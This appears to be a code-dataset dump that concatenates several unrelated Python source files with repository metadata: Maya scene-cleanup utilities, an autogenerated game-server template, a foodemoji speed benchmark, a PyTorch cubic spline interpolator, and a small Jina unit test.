result = list(set(result))
return result
def shapeNameCheck( objList = [],
typeList = ['mesh','nurbsCurve','nurbsSurface'],
skipIntermediates = True,
skipMultipleShapes = False,
strict = True ):
if not objList: objList = mc.ls(type=typeList)
shapeList = []
for obj in objList:
if glTools.utils.transform.isTransform(obj):
objShapes = mc.listRelatives(obj,s=True,pa=True)
if not objShapes: continue
if (len(objShapes) > 1) and skipMultipleShapes: continue
tShapeList = mc.listRelatives(obj,s=True,ni=skipIntermediates,pa=True)
for shape in tShapeList:
shapeList.append(obj)
elif glTools.utils.shape.isShape(obj):
shapeList.append(obj)
else:
print('Unable to determine shape from object "'+obj+'"! Skipping...')
invalidShapeNameList = []
for shape in shapeList:
if not typeList.count(mc.objectType(shape)): continue
if skipIntermediates and mc.getAttr(shape+'.intermediateObject'): continue
parent = mc.listRelatives(shape,p=True,pa=True)[0]
shapeSN = mc.ls(shape,sn=True)[0]
parentSN = mc.ls(parent,sn=True)[0]
if strict and (shape != parent+'Shape'):
invalidShapeNameList.append(shape)
if not shapeSN.startswith(parentSN):
invalidShapeNameList.append(shape)
elif not shapeSN.count('Shape'):
invalidShapeNameList.append(shape)
return invalidShapeNameList
def intermediateShapesCheck(objList=[]):
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,transforms=True)
result = []
for obj in objList:
shapes = mc.listRelatives(obj,s=True,pa=True)
if not shapes: shapes = []
for shape in shapes:
if mc.objExists(shape+'.intermediateObject'):
if mc.getAttr(shape+'.intermediateObject'):
result.append(shape)
return result
def multipleShapeCheck(objList=[]):
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,dag=True)
result = []
for transform in objList:
if not glTools.utils.transform.isTransform(transform):
transform = mc.listRelatives(transform,p=True)[0]
shapeList = mc.listRelatives(transform,s=True)
if not shapeList: continue
shapeList = mc.ls(shapeList,type=['mesh','nurbsSurface','nurbsCurve'])
if len(shapeList) > 1: result.append(transform)
return result
def constructionHistoryCheck(geoList=[]):
if not geoList:
geoList = mc.ls(geometry=True)
else:
geoList = mc.listRelatives(geoList,s=True,pa=True)
result = []
for geo in geoList:
hist = mc.listHistory(geo)
if hist.count(geo): hist.remove(geo)
ignore = mc.ls(hist,type=['groupId','shadingEngine','transform'])
hist = list(set(hist)-set(ignore))
if hist:
obj = mc.listRelatives(geo,p=True,pa=True)
result.extend(obj)
if result: result = list(set(result))
return result
def userAttrCheck(objList=[],includeShapes=False):
result = []
if not objList: objList = mc.ls()
for obj in objList:
userAttrs = mc.listAttr(obj,ud=True)
if not userAttrs: userAttrs = []
for attr in userAttrs:
result.append(obj+'.'+attr)
if includeShapes:
shapes = mc.listRelatives(obj,s=True)
if not shapes: shapes = []
for shape in shapes:
userAttrs = mc.listAttr(shape,ud=True)
if not userAttrs: userAttrs = []
for attr in userAttrs:
result.append(shape+'.'+attr)
return result
def emptyGroupCheck(objList=[]):
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,transforms=True)
result = []
for grp in objList:
if not mc.listRelatives(grp,ad=True):
result.append(grp)
return result
def emptySetCheck(setList=[]):
if not setList: setList = mc.ls(sets=True)
result = []
for setName in setList:
if not mc.ls(setName,sets=True): continue
if setName.startswith('default'): continue
if setName.startswith('initial'): continue
if not mc.sets(setName,q=True):
result.append(setName)
return result
def emptyLayerCheck(layerList=[]):
if not layerList: layerList = mc.ls(type=['displayLayer','renderLayer','animLayer'])
else: layerList = mc.ls(layerList,type=['displayLayer','renderLayer','animLayer'])
result = []
for layer in layerList:
if not mc.ls(layer,type=['displayLayer','renderLayer','animLayer']): continue
if layer.startswith('default'): continue
if not glTools.utils.layer.memberList(layer):
result.append(layer)
return result
def animCurveCheck(curveTypeList=['animCurveTL','animCurveTA','animCurveTT','animCurveTU','animCurveUL','animCurveUA','animCurveUT','animCurveUU']):
animCurves = []
for curveType in curveTypeList:
curveList = mc.ls(type=curveType)
if curveList:
animCurves.extend(curveList)
return animCurves
def unusedShadingNodeCheck():
return glTools.utils.shader.listUnusedShadingNodes()
def noGeometryShaderCheck(geoList=[]):
if not geoList:
geoList = mc.ls(type=['mesh','nurbsSurface'],ni=True)
else:
geoList += mc.ls(mc.listRelatives(geoList,ad=True,pa=True) or [],type=['mesh','nurbsSurface'],ni=True) or []
geoList = mc.ls(geoList,type=['mesh','nurbsSurface'],ni=True)
noShaderList = []
for geo in geoList:
SG = glTools.utils.shader.getSG(geo)
if not SG: noShaderList.append(geo)
return noShaderList
def unusedReferenceCheck():
result = []
refList = glTools.utils.reference.listReferences()
for ref in refList:
try: refFile = glTools.utils.reference.getReferenceFile(ref)
except: result.append(ref)
return result
def unknownNodeCheck():
result = mc.ls(type='unknown')
if not result: result = []
return result
def checkTransforms(objList=[],tol=0.0000000001):
if not objList: objList = mc.ls(transforms=True)
if not objList: return []
transformList = []
for obj in objList:
if obj == 'persp': continue
if obj == 'front': continue
if obj == 'side': continue
if obj == 'top': continue
if abs(mc.getAttr(obj+'.tx')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.ty')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.tz')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.rx')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.ry')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.rz')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.sx') - 1.0) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.sy') - 1.0) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.sz') - 1.0) > tol:
transformList.append(obj)
continue
return transformList
def displayOverridesCheck(objList=[]):
if not objList: objList = mc.ls(dag=True)
else: objList = mc.ls(objList,dag=True)
displayOverrideList = []
for obj in objList:
if mc.getAttr(obj+'.overrideEnabled'):
displayOverrideList.append(obj)
return displayOverrideList
def shapeNameFix(shape):
parent = mc.listRelatives(shape,p=True)[0]
shapeName = parent+'Shape'
if mc.objExists(shapeName):
raise Exception('Shape "'+shapeName+'" already exists! Unable to rename shape "'+shape+'"!')
newShape = mc.rename(shape,shapeName)
return newShape
def deleteIntermediateShapes(objList=[]):
intermediateShapeList = intermediateShapesCheck(objList)
if intermediateShapeList: mc.delete(intermediateShapeList)
return intermediateShapeList
def deleteConstructionHistory(geoList=[]):
if not geoList: geoList = mc.ls(geometry=True)
for geo in geoList: mc.delete(geo,ch=True)
return geoList
def deleteUserAttrs(nodeList=[],includeShapes=False):
if not nodeList: nodeList = mc.ls()
for node in nodeList:
glTools.utils.attribute.deleteUserAttrs(node)
if includeShapes:
shapes = mc.listRelatives(node,s=True)
for shape in shapes:
glTools.utils.attribute.deleteUserAttrs(shape)
def deleteEmptyGroups(objList=[]):
emptyGrpList = emptyGroupCheck(objList=objList)
if emptyGrpList: mc.delete(emptyGrpList)
return emptyGrpList
def deleteEmptySets(setList=[]):
emptySetList = emptySetCheck(setList=setList)
if emptySetList: mc.delete(emptySetList)
return emptySetList
def deleteEmptyLayers(layerList=[]):
emptyLayerList = emptyLayerCheck(layerList=layerList)
if emptyLayerList: mc.delete(emptyLayerList)
return emptyLayerList
def deleteUnknownNodes():
unknownNodes = unknownNodeCheck() or []
for node in unknownNodes:
try:
mc.lockNode(node,l=False)
mc.delete(node)
except:
print('Problem deleting unknown node "'+node+'"!')
return unknownNodes
def deleteNodesByType(nodeTypeList=[]):
if not nodeTypeList: return []
nodeList = mc.ls(type=nodeTypeList)
if nodeList: mc.delete(nodeList)
else: nodeList = []
return nodeList
def deleteUnusedReferenceNodes():
mm.eval('RNdeleteUnused')
def deleteEmptySets(setList=[]):
if not setList: setList = mc.ls(sets=True)
emptySetList = []
for set in setList:
if not mc.sets(set,q=True):
emptySetList.append(set)
for emptySet in emptySetList:
try: mc.delete(emptySet)
except: pass
return emptySetList
def deleteAllSets(excludeList=[]):
setList = mc.ls(sets=True)
if excludeList:
excludeSetList = mc.ls(excludeList,sets=True)
setList = list(set(setList)-set(excludeSetList))
for deleteSet in setList:
try: mc.delete(deleteSet)
except: pass
return setList
def deleteUnusedShadingNodes():
mm.eval('MLdeleteUnused')
def deleteDisplayLayers():
displayLayers = mc.ls(type='displayLayer')
displayLayers.remove('defaultLayer')
if displayLayers: mc.delete(displayLayers)
return displayLayers
def deleteRenderLayers():
renderLayers = mc.ls(type='renderLayer')
renderLayers.remove('defaultRenderLayer')
if renderLayers: mc.delete(renderLayers)
return renderLayers
def assignInitialShadingGroup(geoList=[]):
if not geoList: geoList = mc.ls(geometry=True)
if not geoList: return []
mc.sets(geoList,fe='initialShadingGroup')
return geoList
def zeroTransforms(objList=[]):
if not objList: objList = mc.ls(transforms=True)
if not objList: return []
for obj in objList:
if mc.getAttr(obj+'.tx',se=True): mc.setAttr(obj+'.tx',0)
if mc.getAttr(obj+'.ty',se=True): mc.setAttr(obj+'.ty',0)
if mc.getAttr(obj+'.tz',se=True): mc.setAttr(obj+'.tz',0)
if mc.getAttr(obj+'.rx',se=True): mc.setAttr(obj+'.rx',0)
if mc.getAttr(obj+'.ry',se=True): mc.setAttr(obj+'.ry',0)
if mc.getAttr(obj+'.rz',se=True): mc.setAttr(obj+'.rz',0)
if mc.getAttr(obj+'.sx',se=True): mc.setAttr(obj+'.sx',0)
if mc.getAttr(obj+'.sy',se=True): mc.setAttr(obj+'.sy',0)
if mc.getAttr(obj+'.sz',se=True): mc.setAttr(obj+'.sz',0)
return objList
def copyInputShapeAttrs(geoList=[]):
if not geoList: geoList = mc.listRelatives(mc.ls(geometry=True) or [],p=True,pa=True) or []
if not geoList: return []
for geo in geoList:
geoShape = mc.listRelatives(geo,s=True,ni=True) or []
if not geoShape:
print('No shape found for geometry transform "'+geo+'"!')
continue
geoInputShape = geoShape[0]
try: geoInputShape = glTools.utils.shape.findInputShape(geoShape[0])
except: pass
if geoInputShape != geoShape[0]:
userAttr = mc.listAttr(geoInputShape,ud=True,s=True) or []
for at in userAttr: glTools.utils.attribute.copyAttr(geoInputShape,geoShape[0],at)
def removeTurtle():
turtleNode = 'TurtleDefaultBakeLayer'
if mc.objExists(turtleNode):
print('Removing Turtle nodes...')
mc.lockNode(turtleNode,l=False)
mc.delete(turtleNode)
if mc.pluginInfo('Turtle',q=True,loaded=True):
print('Unloading Turtle plugin...')
try: mc.unloadPlugin('Turtle',f=True)
except: print('Error unloading Turtle plugin!')
| true
| true
|
790c8a5ad4870b39b761cf8182a056f45a6f79f3
| 446
|
py
|
Python
|
data/scripts/templates/object/mobile/shared_warren_bors_teraud.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20
|
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/mobile/shared_warren_bors_teraud.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/mobile/shared_warren_bors_teraud.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20
|
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_warren_bors_teraud.iff"
result.attribute_template_id = 9
result.stfName("npc_name","warren_bors_teraud")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 26.235294
| 64
| 0.730942
| true
| true
|
|
790c8b129da1130af784e30e95e0fd923fc98ff0
| 5,432
|
py
|
Python
|
tests/speed.py
|
cvzi/foodemoji
|
b43d80f5a6abada96d8383a5fb442e4bf4083631
|
[
"MIT"
] | 1
|
2021-07-28T18:31:59.000Z
|
2021-07-28T18:31:59.000Z
|
tests/speed.py
|
cvzi/foodemoji
|
b43d80f5a6abada96d8383a5fb442e4bf4083631
|
[
"MIT"
] | null | null | null |
tests/speed.py
|
cvzi/foodemoji
|
b43d80f5a6abada96d8383a5fb442e4bf4083631
|
[
"MIT"
] | 1
|
2018-10-23T09:20:52.000Z
|
2018-10-23T09:20:52.000Z
|
# -*- coding: utf-8 -*-
# https://github.com/cvzi/foodemoji
import sys
import os
import timeit
try:
import foodemoji
except ImportError:
include = os.path.relpath(os.path.join(os.path.dirname(__file__), ".."))
sys.path.insert(0, include)
import foodemoji
print("Imported foodemoji from %s" % os.path.abspath(os.path.join(include, "foodemoji")))
PY2 = sys.version_info.major == 2
text = """Erbsencremesuppe
Mousse Tiramisu, Wackelpudding Kirsch (vegan)
Milch Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten
Tagessuppe,
Fish + Chips,
Remouladensauce,
Salat der Saison
Tagessuppe,
2 Polentaschnitten mit Spinatfüllung,
Tomatensauce,
Reis,
Salat der Saison
Karotten-Ingwersuppe
Rote Grütze (vegan), Zweierlei Mousse au Chocolat
Milch
Tagessuppe,
Schweinegulasch,
Champignonsauce,
Salzkartoffeln,
Salat der Saison
Tagessuppe,
5 Cannelloni mit Ricotta-Spinat-Füllung,
Tomatensauce,
Reibekäse,
Salat der Saison
Tomatencremesuppe
Milchreis mit Kirschen, Rote Grütze (vegan)
Tagessuppe,
Feuerwurst,
Portion Senf,
Pommes frites,
Salat der Saison
Tagessuppe,
2 Kartoffelknödel,
Rahmgemüse,
Salat der Saison
Kohlrabicremesuppe Creme Brulee, Kokosmilch mit Ananas (vegan) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten Erbseneintopf, Bockwurst, Kartoffeln, Brötchen, Salat der Saison, Schokopudding Tagessuppe, Asiatische Gemüseknusperschnitte, Wasabi Currysauce, Reis, Salat der Saison, Gebrannte Grießsuppe Kokosmilch mit Ananas (vegan), Mousse au Chocolat Milch (ML) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten D: Tagessuppe, Schweinegeschnetzeltes, Pilzrahmsauce, Reis, Salat der Saison Tagessuppe, Knöpflepfanne "Allgäu", Käsesauce, Salat der Saison.
Brokkolicremesuppe
Sojajoghurt mit Früchten (vegan), Tiramisu
Milch (ML)
Tagessuppe,
paniertes Alaska-Seelachsfilet,
Dillmayonnaise,
Petersilienkartoffeln,
Salat der Saison
Tagessuppe,
veganes Geschnetzeltes „Züricher Art",
Reis,
Salat der Saison
"""
text_short = """Erbsencremesuppe
Mousse Tiramisu, Wackelpudding Kirsch (vegan)
Milch Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten
Kohlrabicremesuppe Creme Brulee, Kokosmilch mit Ananas (vegan) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten Erbseneintopf, Bockwurst, Kartoffeln, Brötchen, Salat der Saison, Schokopudding Tagessuppe, Asiatische Gemüseknusperschnitte, Wasabi Currysauce, Reis, Salat der Saison, Gebrannte Grießsuppe Kokosmilch mit Ananas (vegan), Mousse au Chocolat Milch (ML) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten D: Tagessuppe, Schweinegeschnetzeltes, Pilzrahmsauce, Reis, Salat der Saison Tagessuppe, Knöpflepfanne "Allgäu", Käsesauce, Salat der Saison.
Salat der Saison
"""
text_one_line = "Milch Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten"
book = ""
def _setup():
global book
filename = 'italienische-reise.txt'
url = 'https://github.com/GITenberg/Italienische-Reise-Band-1_2404/raw/master/2404-8.txt'
if not os.path.isfile(filename):
if PY2:
import urllib2
furl = urllib2.urlopen(url)
book = furl.read().decode('cp1252' ,errors='ignore')
furl.close()
else:
import urllib.request
with urllib.request.urlopen(url) as furl:
book = furl.read().decode('utf-8' ,errors='ignore')
with open(filename, 'wb') as fout:
fout.write(book.encode('utf-8'))
else:
with open(filename, 'rb') as fin:
book = fin.read().decode('utf-8')
def test_long_text_100():
x = foodemoji.decorate(text)
return x[0] == text[0]
def test_long_text_linebyline_100():
x = foodemoji.decorate(text, line_by_line=True)
return x[0] == text[0]
def test_short_text_300():
x = foodemoji.decorate(text_short)
return x[0] == text_short[0]
def test_short_text_linebyline_300():
x = foodemoji.decorate(text_short, line_by_line=True)
return x[0] == text_short[0]
def test_one_line_1000():
x = foodemoji.decorate(text_one_line)
return x[0] == text_one_line[0]
def test_one_line_linebyline_1000():
x = foodemoji.decorate(text_one_line, line_by_line=True)
return x[0] == text_one_line[0]
def test_book_2():
x = foodemoji.decorate(book)
return x[0] == book[0]
def test_book_linebyline_2():
x = foodemoji.decorate(book, line_by_line=True)
return x[0] == book[0]
_setup()
if __name__ == '__main__':
for fname in sorted(list(globals().keys())):
if fname.startswith('test_'):
if fname.split('_')[-1].isdigit():
N = int(fname.split('_')[-1])
else:
N = 100
print("% 6dx\t\t%s():" % (N, fname))
t = timeit.timeit('speed.%s()' % fname, setup='import speed', number=N)
print("{:25.20f}".format(t))
| 36.952381
| 780
| 0.726804
|
import sys
import os
import timeit
try:
import foodemoji
except ImportError:
include = os.path.relpath(os.path.join(os.path.dirname(__file__), ".."))
sys.path.insert(0, include)
import foodemoji
print("Imported foodemoji from %s" % os.path.abspath(os.path.join(include, "foodemoji")))
PY2 = sys.version_info.major == 2
text = """Erbsencremesuppe
Mousse Tiramisu, Wackelpudding Kirsch (vegan)
Milch Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten
Tagessuppe,
Fish + Chips,
Remouladensauce,
Salat der Saison
Tagessuppe,
2 Polentaschnitten mit Spinatfüllung,
Tomatensauce,
Reis,
Salat der Saison
Karotten-Ingwersuppe
Rote Grütze (vegan), Zweierlei Mousse au Chocolat
Milch
Tagessuppe,
Schweinegulasch,
Champignonsauce,
Salzkartoffeln,
Salat der Saison
Tagessuppe,
5 Cannelloni mit Ricotta-Spinat-Füllung,
Tomatensauce,
Reibekäse,
Salat der Saison
Tomatencremesuppe
Milchreis mit Kirschen, Rote Grütze (vegan)
Tagessuppe,
Feuerwurst,
Portion Senf,
Pommes frites,
Salat der Saison
Tagessuppe,
2 Kartoffelknödel,
Rahmgemüse,
Salat der Saison
Kohlrabicremesuppe Creme Brulee, Kokosmilch mit Ananas (vegan) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten Erbseneintopf, Bockwurst, Kartoffeln, Brötchen, Salat der Saison, Schokopudding Tagessuppe, Asiatische Gemüseknusperschnitte, Wasabi Currysauce, Reis, Salat der Saison, Gebrannte Grießsuppe Kokosmilch mit Ananas (vegan), Mousse au Chocolat Milch (ML) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten D: Tagessuppe, Schweinegeschnetzeltes, Pilzrahmsauce, Reis, Salat der Saison Tagessuppe, Knöpflepfanne "Allgäu", Käsesauce, Salat der Saison.
Brokkolicremesuppe
Sojajoghurt mit Früchten (vegan), Tiramisu
Milch (ML)
Tagessuppe,
paniertes Alaska-Seelachsfilet,
Dillmayonnaise,
Petersilienkartoffeln,
Salat der Saison
Tagessuppe,
veganes Geschnetzeltes „Züricher Art",
Reis,
Salat der Saison
"""
text_short = """Erbsencremesuppe
Mousse Tiramisu, Wackelpudding Kirsch (vegan)
Milch Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten
Kohlrabicremesuppe Creme Brulee, Kokosmilch mit Ananas (vegan) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten Erbseneintopf, Bockwurst, Kartoffeln, Brötchen, Salat der Saison, Schokopudding Tagessuppe, Asiatische Gemüseknusperschnitte, Wasabi Currysauce, Reis, Salat der Saison, Gebrannte Grießsuppe Kokosmilch mit Ananas (vegan), Mousse au Chocolat Milch (ML) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten D: Tagessuppe, Schweinegeschnetzeltes, Pilzrahmsauce, Reis, Salat der Saison Tagessuppe, Knöpflepfanne "Allgäu", Käsesauce, Salat der Saison.
Salat der Saison
"""
text_one_line = "Milch Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten"
book = ""
def _setup():
global book
filename = 'italienische-reise.txt'
url = 'https://github.com/GITenberg/Italienische-Reise-Band-1_2404/raw/master/2404-8.txt'
if not os.path.isfile(filename):
if PY2:
import urllib2
furl = urllib2.urlopen(url)
book = furl.read().decode('cp1252' ,errors='ignore')
furl.close()
else:
import urllib.request
with urllib.request.urlopen(url) as furl:
book = furl.read().decode('utf-8' ,errors='ignore')
with open(filename, 'wb') as fout:
fout.write(book.encode('utf-8'))
else:
with open(filename, 'rb') as fin:
book = fin.read().decode('utf-8')
def test_long_text_100():
x = foodemoji.decorate(text)
return x[0] == text[0]
def test_long_text_linebyline_100():
x = foodemoji.decorate(text, line_by_line=True)
return x[0] == text[0]
def test_short_text_300():
x = foodemoji.decorate(text_short)
return x[0] == text_short[0]
def test_short_text_linebyline_300():
x = foodemoji.decorate(text_short, line_by_line=True)
return x[0] == text_short[0]
def test_one_line_1000():
x = foodemoji.decorate(text_one_line)
return x[0] == text_one_line[0]
def test_one_line_linebyline_1000():
x = foodemoji.decorate(text_one_line, line_by_line=True)
return x[0] == text_one_line[0]
def test_book_2():
x = foodemoji.decorate(book)
return x[0] == book[0]
def test_book_linebyline_2():
x = foodemoji.decorate(book, line_by_line=True)
return x[0] == book[0]
_setup()
if __name__ == '__main__':
for fname in sorted(list(globals().keys())):
if fname.startswith('test_'):
if fname.split('_')[-1].isdigit():
N = int(fname.split('_')[-1])
else:
N = 100
print("% 6dx\t\t%s():" % (N, fname))
t = timeit.timeit('speed.%s()' % fname, setup='import speed', number=N)
print("{:25.20f}".format(t))
| true
| true
|
790c8bd261da619e5576efa5d9c7891f5c5b2620
| 3,856
|
py
|
Python
|
loss/robust_loss_pytorch/robust_loss_pytorch/cubic_spline.py
|
milesgray/CALAE
|
a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac
|
[
"Apache-2.0"
] | 522
|
2019-05-15T23:09:14.000Z
|
2022-03-19T14:17:22.000Z
|
robust_loss_pytorch/cubic_spline.py
|
durandtibo/robust_loss_pytorch
|
911378b855f567e942336ae609cb8edb52e55228
|
[
"Apache-2.0"
] | 31
|
2019-06-03T10:55:22.000Z
|
2022-03-24T21:58:46.000Z
|
robust_loss_pytorch/cubic_spline.py
|
durandtibo/robust_loss_pytorch
|
911378b855f567e942336ae609cb8edb52e55228
|
[
"Apache-2.0"
] | 80
|
2019-05-29T14:21:49.000Z
|
2022-01-11T07:52:50.000Z
|
# coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements 1D cubic Hermite spline interpolation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
def interpolate1d(x, values, tangents):
r"""Perform cubic hermite spline interpolation on a 1D spline.
The x coordinates of the spline knots are at [0 : 1 : len(values)-1].
Queries outside of the range of the spline are computed using linear
extrapolation. See https://en.wikipedia.org/wiki/Cubic_Hermite_spline
for details, where "x" corresponds to `x`, "p" corresponds to `values`, and
"m" corresponds to `tangents`.
Args:
x: A tensor of any size of single or double precision floats containing the
set of values to be used for interpolation into the spline.
values: A vector of single or double precision floats containing the value
of each knot of the spline being interpolated into. Must be the same
length as `tangents` and the same type as `x`.
tangents: A vector of single or double precision floats containing the
tangent (derivative) of each knot of the spline being interpolated into.
Must be the same length as `values` and the same type as `x`.
Returns:
The result of interpolating along the spline defined by `values`, and
`tangents`, using `x` as the query values. Will be the same length and type
as `x`.
"""
# if x.dtype == 'float64' or torch.as_tensor(x).dtype == torch.float64:
# float_dtype = torch.float64
# else:
# float_dtype = torch.float32
# x = torch.as_tensor(x, dtype=float_dtype)
# values = torch.as_tensor(values, dtype=float_dtype)
# tangents = torch.as_tensor(tangents, dtype=float_dtype)
assert torch.is_tensor(x)
assert torch.is_tensor(values)
assert torch.is_tensor(tangents)
float_dtype = x.dtype
assert values.dtype == float_dtype
assert tangents.dtype == float_dtype
assert len(values.shape) == 1
assert len(tangents.shape) == 1
assert values.shape[0] == tangents.shape[0]
x_lo = torch.floor(torch.clamp(x, torch.as_tensor(0),
values.shape[0] - 2)).type(torch.int64)
x_hi = x_lo + 1
# Compute the relative distance between each `x` and the knot below it.
t = x - x_lo.type(float_dtype)
# Compute the cubic hermite expansion of `t`.
t_sq = t**2
t_cu = t * t_sq
h01 = -2. * t_cu + 3. * t_sq
h00 = 1. - h01
h11 = t_cu - t_sq
h10 = h11 - t_sq + t
# Linearly extrapolate above and below the extents of the spline for all
# values.
value_before = tangents[0] * t + values[0]
value_after = tangents[-1] * (t - 1.) + values[-1]
# Cubically interpolate between the knots below and above each query point.
neighbor_values_lo = values[x_lo]
neighbor_values_hi = values[x_hi]
neighbor_tangents_lo = tangents[x_lo]
neighbor_tangents_hi = tangents[x_hi]
value_mid = (
neighbor_values_lo * h00 + neighbor_values_hi * h01 +
neighbor_tangents_lo * h10 + neighbor_tangents_hi * h11)
# Return the interpolated or extrapolated values for each query point,
# depending on whether or not the query lies within the span of the spline.
return torch.where(t < 0., value_before,
torch.where(t > 1., value_after, value_mid))
| 39.346939
| 79
| 0.713174
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
def interpolate1d(x, values, tangents):
assert torch.is_tensor(x)
assert torch.is_tensor(values)
assert torch.is_tensor(tangents)
float_dtype = x.dtype
assert values.dtype == float_dtype
assert tangents.dtype == float_dtype
assert len(values.shape) == 1
assert len(tangents.shape) == 1
assert values.shape[0] == tangents.shape[0]
x_lo = torch.floor(torch.clamp(x, torch.as_tensor(0),
values.shape[0] - 2)).type(torch.int64)
x_hi = x_lo + 1
t = x - x_lo.type(float_dtype)
t_sq = t**2
t_cu = t * t_sq
h01 = -2. * t_cu + 3. * t_sq
h00 = 1. - h01
h11 = t_cu - t_sq
h10 = h11 - t_sq + t
value_before = tangents[0] * t + values[0]
value_after = tangents[-1] * (t - 1.) + values[-1]
neighbor_values_lo = values[x_lo]
neighbor_values_hi = values[x_hi]
neighbor_tangents_lo = tangents[x_lo]
neighbor_tangents_hi = tangents[x_hi]
value_mid = (
neighbor_values_lo * h00 + neighbor_values_hi * h01 +
neighbor_tangents_lo * h10 + neighbor_tangents_hi * h11)
return torch.where(t < 0., value_before,
torch.where(t > 1., value_after, value_mid))
| true
| true
|
790c8c1d71d3b4e18a00157853ed455148a3968d
| 519
|
py
|
Python
|
crafters/numeric/ArrayStringReader/tests/test_arraystringreader.py
|
carlosb1/jina-hub
|
f298d0f136c8627dd720d7a4e3eb9031655f5ccb
|
[
"Apache-2.0"
] | 1
|
2022-03-01T12:43:17.000Z
|
2022-03-01T12:43:17.000Z
|
crafters/numeric/ArrayStringReader/tests/test_arraystringreader.py
|
carlosb1/jina-hub
|
f298d0f136c8627dd720d7a4e3eb9031655f5ccb
|
[
"Apache-2.0"
] | null | null | null |
crafters/numeric/ArrayStringReader/tests/test_arraystringreader.py
|
carlosb1/jina-hub
|
f298d0f136c8627dd720d7a4e3eb9031655f5ccb
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from .. import ArrayStringReader
def test_arraystringreader():
"""here is my test code
https://docs.pytest.org/en/stable/getting-started.html#create-your-first-test
"""
size = 8
sample_array = np.random.rand(size).astype('float32')
text = ','.join([str(x) for x in sample_array])
reader = ArrayStringReader()
crafted_doc = reader.craft(text, 0)
assert crafted_doc['blob'].shape[0] == size
np.testing.assert_array_equal(crafted_doc['blob'], sample_array)
| 25.95
| 81
| 0.687861
|
import numpy as np
from .. import ArrayStringReader
def test_arraystringreader():
size = 8
sample_array = np.random.rand(size).astype('float32')
text = ','.join([str(x) for x in sample_array])
reader = ArrayStringReader()
crafted_doc = reader.craft(text, 0)
assert crafted_doc['blob'].shape[0] == size
np.testing.assert_array_equal(crafted_doc['blob'], sample_array)
| true
| true
|
790c8ccc9ff42ab78d01890aefd7ce0b436f416c
| 109
|
py
|
Python
|
mayan/apps/dependencies/__init__.py
|
Syunkolee9891/Mayan-EDMS
|
3759a9503a264a180b74cc8518388f15ca66ac1a
|
[
"Apache-2.0"
] | 1
|
2021-06-17T18:24:25.000Z
|
2021-06-17T18:24:25.000Z
|
mayan/apps/dependencies/__init__.py
|
